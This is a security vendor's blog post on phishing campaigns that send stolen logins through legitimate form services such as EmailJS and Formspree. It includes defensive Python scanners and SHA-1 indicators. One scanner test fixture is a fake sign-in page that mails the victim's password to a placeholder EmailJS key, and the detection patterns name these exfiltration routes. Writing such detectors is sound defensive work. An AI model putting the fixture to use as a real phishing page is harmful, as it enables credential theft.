blog.checkpoint.com
‘SIGN IN TO CONTINUE’ AND SUFFER: ATTACKERS ABUSING LEGITIMATE SERVICES FOR CREDENTIAL THEFT

Security | June 19, 2023 | By Check Point Team

HIGHLIGHTS:

* Check Point Research (CPR) detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
* HTML files are one of the most common attack vectors and are used by attackers for phishing and other scams.
* Check Point Software’s customers remain protected against this attack.

INTRODUCTION

According to Check Point Harmony Email researchers, credential harvesting has continually been the top attack vector, accounting for 59% of reported attacks. It also plays a major role in Business Email Compromise (BEC), where it accounts for up to 15% of attacks. To steal the user’s credentials, phishing emails contain a malicious URL or attachment. According to Check Point’s telemetry, more than 50% of malicious attachments are HTML files. To trick the user, many of those attachments take the form of a disguised login page of a known service or vendor such as Microsoft, webmail, etc.

Figure 1: Malicious attachments by file type.
Source: Check Point Research

The user enters his credentials in the spoofed login form, clicks submit, and the credentials are sent to the malicious actor, usually through a web server or Telegram’s API.

During the past few months, CPR has observed ongoing campaigns involving thousands of emails that take advantage of legitimate services, including EmailJS, Formbold, Formspree and Formspark, to harvest these stolen credentials.

These services are all online form builders that allow you to create custom forms for your website or web application, and they are used by many developers. They provide a user-friendly interface for building forms that can be embedded in a website or application, and they offer various field types (text inputs, radio buttons, checkboxes, dropdown menus and more) for collecting information from users in a structured way. Once a user submits the form, the service handles the processing of the form data; in the campaigns described here, that processing is exactly what delivers the stolen credentials to the attacker.

Figure 2: Credential harvesting process

CREDENTIAL HARVESTING

Credential harvesting is a type of cyberattack in which malicious actors acquire sensitive information such as usernames and passwords, either to gain initial access to an organization or to sell it online. Many of these attacks do not target a specific organization; they try to gather as many different usernames and passwords as possible in order to sell them online.

Figure 3: Dark web forum selling stolen credentials.

TECHNIQUE OVERVIEW

In the past, attackers used two main methods to harvest credentials. The first is a PHP file hosted on a compromised site; here the attacker runs the risk of the site being blocked by network security solutions. The second is Telegram’s API, but this method is widely known to security vendors, which makes it more likely to be blocked.
This new method of using a legitimate form service’s API, which is also used by many developers, makes malicious HTML files harder to block. Through this API the credentials can be sent wherever the attacker chooses, even straight to his own mailbox.

EMAILJS

Let us take EmailJS as an example. EmailJS is a service that allows developers to send emails using client-side technology only, without any server code. To use the service, all one needs to do is:

1. Connect an email address to the service.
2. Create an email template, which decides how the email is sent and to which address.
3. Use their SDK or API to send emails from JavaScript.

The service is free for up to 200 emails per month, and paid subscriptions allow up to 100,000 emails per month. The service is legitimate and, according to its official website, is used by more than 25,000 developers.

Figure 4: EmailJS official website

Here are two examples of how malicious actors are using this service to harvest stolen credentials.

Figure 5: Phishing page using EmailJS

In Figure 5, the attacker first calls “emailjs.init” with his public key. The function “sendEmail”, which is triggered when the user submits the form, then calls “emailjs.send”, which delivers the form data to the attacker’s email account.

Figure 6: Another example using EmailJS from the HTML file

In Figure 6 the attacker uses the EmailJS API directly to send himself the victim’s credentials.

The above examples were used in the campaign we observed. We also found two different EmailJS public API keys that were used in the campaign.

AN ONGOING CAMPAIGN – OVERVIEW

One of the ongoing campaigns we detected starts with a phishing email that conveys a sense of urgency to make the user open the attachment. The campaign involved multiple versions of the email itself and a few different HTML templates.
Figure 7: Example of a phishing email used in the campaign

The attached file corresponds to the email that the victim received, and we saw multiple versions of it.

Figure 8: HTML attachments masquerade as document and webmail sign in

To make the sign-in page seem more legitimate, the campaign author pre-fills the victim’s email address in the form; the address is hardcoded in the HTML file. Once the victim enters his credentials and tries to log in, the username and password are sent straight to the attacker’s email inbox.

Figure 9: Credential harvesting process using EmailJS

Figure 10: Example of an HTML attachment using Formspark

CONCLUSION

We observed a rise in the use of legitimate services by attackers, which makes these attacks harder to defend against and can lead to credential theft in the organization.

CHECK POINT CUSTOMERS REMAIN PROTECTED AGAINST THESE KINDS OF PHISHING ATTACKS.

Check Point Threat Emulation customers are protected against this attack. The speed and sophistication of evasive zero-day and phishing attacks requires AI deep learning to predict and block malicious behavior without human intervention. Check Point Titan revolutionizes threat prevention and security management with AI deep learning, advanced cloud services, integrated IoT security, and firewall auto-scaling performance for mission-critical applications.

PHISHING PREVENTION

Check Point achieved a 99.9% score in phishing prevention in the Miercom benchmark report, scoring 99.7% in malware prevention tests and nearly 0% missed detections of phishing, malware and zero-day phishing URLs.

HOW TO SPOT PHISHING EMAILS & STAY PROTECTED

Phishing attacks pose a significant threat to enterprise cybersecurity because they are designed to exploit an organization’s employees rather than vulnerabilities in its software or cybersecurity infrastructure.
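The EmailJS pattern from Figures 5 and 6 (emailjs.init with a public key, a submit handler that calls emailjs.send, or a direct call to the REST endpoint), the hardcoded victim address from Figure 8, and the Formspark/Formspree/Formbold submission endpoints can all be checked for in a single pass over an HTML attachment at the mail gateway. The scanner below is an added example written for this post, not Check Point's code or any of the services' own; the endpoint and SDK patterns are the public submission URLs and package names the services document (re-verify them before using this as a blocking rule), and the two HTML fixtures are constructed with placeholder IDs, not samples from the campaign.

```python
"""Triage an HTML e-mail attachment for the pattern described above: a fake
sign-in form (password field, often with the victim's address pre-filled)
whose submission is wired to a legitimate form-builder or mail-relay API
rather than to the vendor being impersonated.

Added example; not Check Point's code. The SDK/endpoint patterns are the
public submission URLs and SDK names of the four services as published in
their own documentation (assumption: re-verify before using as a rule)."""
import re
from html.parser import HTMLParser

# service -> regexes that identify its client SDK or submission endpoint
FORM_SERVICE_PATTERNS = {
    "emailjs": [
        r"api\.emailjs\.com",                       # raw REST endpoint (Figure 6 style)
        r"emailjs(?:-com|/browser)",                # SDK package / CDN name
        r"\bemailjs\.(?:init|send|sendForm)\s*\(",  # SDK calls (Figure 5 style)
    ],
    "formspree": [r"formspree\.io/f/"],
    "formspark": [r"submit-form\.com/"],
    "formbold": [r"formbold\.com/s/"],
}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")


class _FormCollector(HTMLParser):
    """Record <form action> and <input> attributes; ignore everything else."""

    def __init__(self):
        super().__init__()
        self.inputs = []
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input":
            self.inputs.append(a)
        elif tag == "form":
            self.actions.append(a.get("action", ""))


def scan_html(doc: str) -> dict:
    """Return the indicators found in one HTML attachment plus a verdict."""
    collector = _FormCollector()
    collector.feed(doc)
    services = sorted(
        name for name, patterns in FORM_SERVICE_PATTERNS.items()
        if any(re.search(p, doc, re.IGNORECASE) for p in patterns)
    )
    has_password = any(i.get("type", "").lower() == "password" for i in collector.inputs)
    prefilled = [i["value"] for i in collector.inputs if EMAIL_RE.match(i.get("value", ""))]

    # A password prompt whose data leaves through a third-party relay is the
    # harvesting pattern. A relay alone is how many legitimate contact forms
    # work, so on its own it only earns a closer look.
    if has_password and services:
        verdict = "credential-harvester"
    elif has_password or services:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "services": services,
        "password_field": has_password,
        "prefilled_emails": prefilled,
        "form_actions": collector.actions,
    }


# Constructed fixtures (not from the campaign): the first mirrors the Figure 5
# layout with placeholder IDs, the second is an ordinary contact form.
PHISHING_SAMPLE = """<html><body>
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
<form id="login" onsubmit="sendEmail(event)">
  <input type="email" id="user_email" name="user_email" value="victim@example.com" readonly>
  <input type="password" id="user_password" name="user_password" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
  emailjs.init("PUBLIC_KEY_PLACEHOLDER");
  function sendEmail(e) {
    e.preventDefault();
    emailjs.send("service_id", "template_id",
                 {email: user_email.value, password: user_password.value});
  }
</script></body></html>"""

CONTACT_SAMPLE = """<form action="https://formspree.io/f/FORM_ID_PLACEHOLDER" method="POST">
  <input type="email" name="email"><textarea name="message"></textarea>
  <button type="submit">Send</button>
</form>"""

if __name__ == "__main__":
    for label, sample in (("phishing", PHISHING_SAMPLE), ("contact", CONTACT_SAMPLE)):
        print(label, scan_html(sample))
```

The split between "credential-harvester" and "review" is the point: the services themselves are not malicious, so the rule keys on the combination of a password field and a third-party relay rather than on the relay alone. Adding the two EmailJS public keys from the campaign (not reproduced here) as literal strings to the emailjs pattern list would turn the generic check into a campaign-specific one.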
The prevalence of phishing attacks and the risk they pose make it critical for an organization to take steps targeted specifically at protecting against them, including:

1. Security Awareness Training: Phishing emails are designed to trick employees into taking a certain action. Training employees to recognize and correctly respond to attempted phishing attacks is essential for mitigating the phishing threat.
2. Email Filtering: Phishers will sometimes use an email address similar to the legitimate one, such as user@cornpany.com instead of user@company.com, or leverage malicious links. To check a link, hover over it with the mouse and verify that it goes to the right place before clicking it. Many common phishing techniques, such as malicious links and lookalike email addresses, can be detected by software: an email filtering solution can identify phishing emails based on these warning signs and block them from reaching the intended recipient’s inbox.
3. Scan for Malicious Attachments: Malicious attachments are a common means of delivering malware via email. Scanning attachments and evaluating them in a sandboxed environment enables an organization to detect and prevent this malware delivery.
4. Watch for Spelling and Grammar: Phishing emails commonly contain spelling mistakes and grammatical errors. If an email sounds wrong or does not match the alleged sender’s voice, it is probably a scam.
5. DLP Solution: Some phishing attacks are designed to steal sensitive information from an organization via email. A data loss prevention (DLP) solution can help detect and block this attempted exfiltration.
6. Anti-Phishing Solution: An anti-phishing solution integrates many of these technological protections as well as other anti-phishing features. Deploying one provides an organization with comprehensive protection against phishing threats.
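For the lookalike-address case in item 2 (user@cornpany.com standing in for user@company.com), a mail filter can normalise the sender domain before comparing it with an allow-list instead of relying on a human to notice the "rn". The check below is an added example, not Check Point's code; TRUSTED_DOMAINS, the confusable tables and the test addresses are constructed for illustration. It goes a little beyond the item by also catching single-character near misses, Cyrillic homoglyphs and a trusted brand used as a subdomain label of an unrelated domain.

```python
"""Sender-domain lookalike check for the filtering step above: catch the
user@cornpany.com-for-user@company.com trick, single-character near misses,
homoglyphs, and a trusted brand buried in a subdomain of an unrelated domain.

Added example; not Check Point's code. TRUSTED_DOMAINS is a constructed
allow-list that a deployment would replace with its own."""
import unicodedata

TRUSTED_DOMAINS = {"company.com", "example-bank.com"}   # constructed allow-list

# Multi-character and digit sequences that read like another letter in
# common fonts, applied to both sides before comparison.
CONFUSABLE_SEQUENCES = [("rn", "m"), ("vv", "w"), ("cl", "d"),
                        ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]
# A few Cyrillic letters that render identically to Latin ones.
HOMOGLYPHS = str.maketrans({"\u0430": "a", "\u0435": "e", "\u043e": "o",
                            "\u0440": "p", "\u0441": "c", "\u0445": "x", "\u0443": "y"})


def skeleton(domain: str) -> str:
    """Normalise a domain to the string a human would perceive on screen."""
    d = domain.strip().rstrip(".").lower()
    try:
        d = d.encode("ascii").decode("idna")   # undo punycode (xn--...) if present
    except UnicodeError:
        pass                                    # already Unicode: nothing to undo
    d = unicodedata.normalize("NFKC", d).translate(HOMOGLYPHS)
    for seq, letter in CONFUSABLE_SEQUENCES:
        d = d.replace(seq, letter)
    return d


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance; domains are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_sender(address: str, trusted=TRUSTED_DOMAINS) -> str:
    """Return 'trusted', 'unknown', or a tagged finding naming the brand abused."""
    domain = address.rsplit("@", 1)[-1].lower().rstrip(".")
    if domain in trusted or any(domain.endswith("." + t) for t in trusted):
        return "trusted"
    sk = skeleton(domain)
    for t in sorted(trusted):
        tsk = skeleton(t)
        if sk == tsk:
            return f"lookalike:{t}"                 # cornpany.com, c0mpany.com, Cyrillic o
        if edit_distance(sk, tsk) == 1:
            return f"near-miss:{t}"                 # compamy.com
        if ("." + domain).startswith("." + t + "."):
            return f"brand-in-subdomain:{t}"        # company.com.login-portal.example
    return "unknown"


if __name__ == "__main__":
    for addr in ("user@company.com", "user@cornpany.com", "user@c0mpany.com",
                 "user@compamy.com", "alerts@company.com.login-portal.example",
                 "user@gmail.com"):
        print(f"{addr:45} -> {classify_sender(addr)}")
```

The skeleton step is what makes "cornpany" and "company" compare equal; the edit-distance step is deliberately limited to a distance of one so that unrelated short domains are not flagged. A production filter would feed the tagged findings into its scoring rather than rejecting outright, since near misses do occur in legitimate third-party mail.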
IOCs

EmailJS samples (SHA-1):
053c0cd2f56b2d8276d0c5e11cbe3a5c96ec278d
d36908ce63f5386ddffaa390a0baef6a045e2254

FormSpark samples (SHA-1):
2c6fe45dbf760970b624b08cb1ff7bc5a5e21aa8
56b2d8a45e34384c4eb2c886037f22c9c90f3721

FormSpree samples (SHA-1):
b07876f8254667e0f023559eed548de7ad967941
4c4a0d818dff16566e4bbad0d3e3fbba18e7063d

FormBold samples (SHA-1):
f82fb2f5f17a5bad4a0dce32ceaea377fe78c905
5da1c26703a80b3f8e663461ef9d612b4ccdee38

©1994-2023 Check Point Software Technologies Ltd. All rights reserved.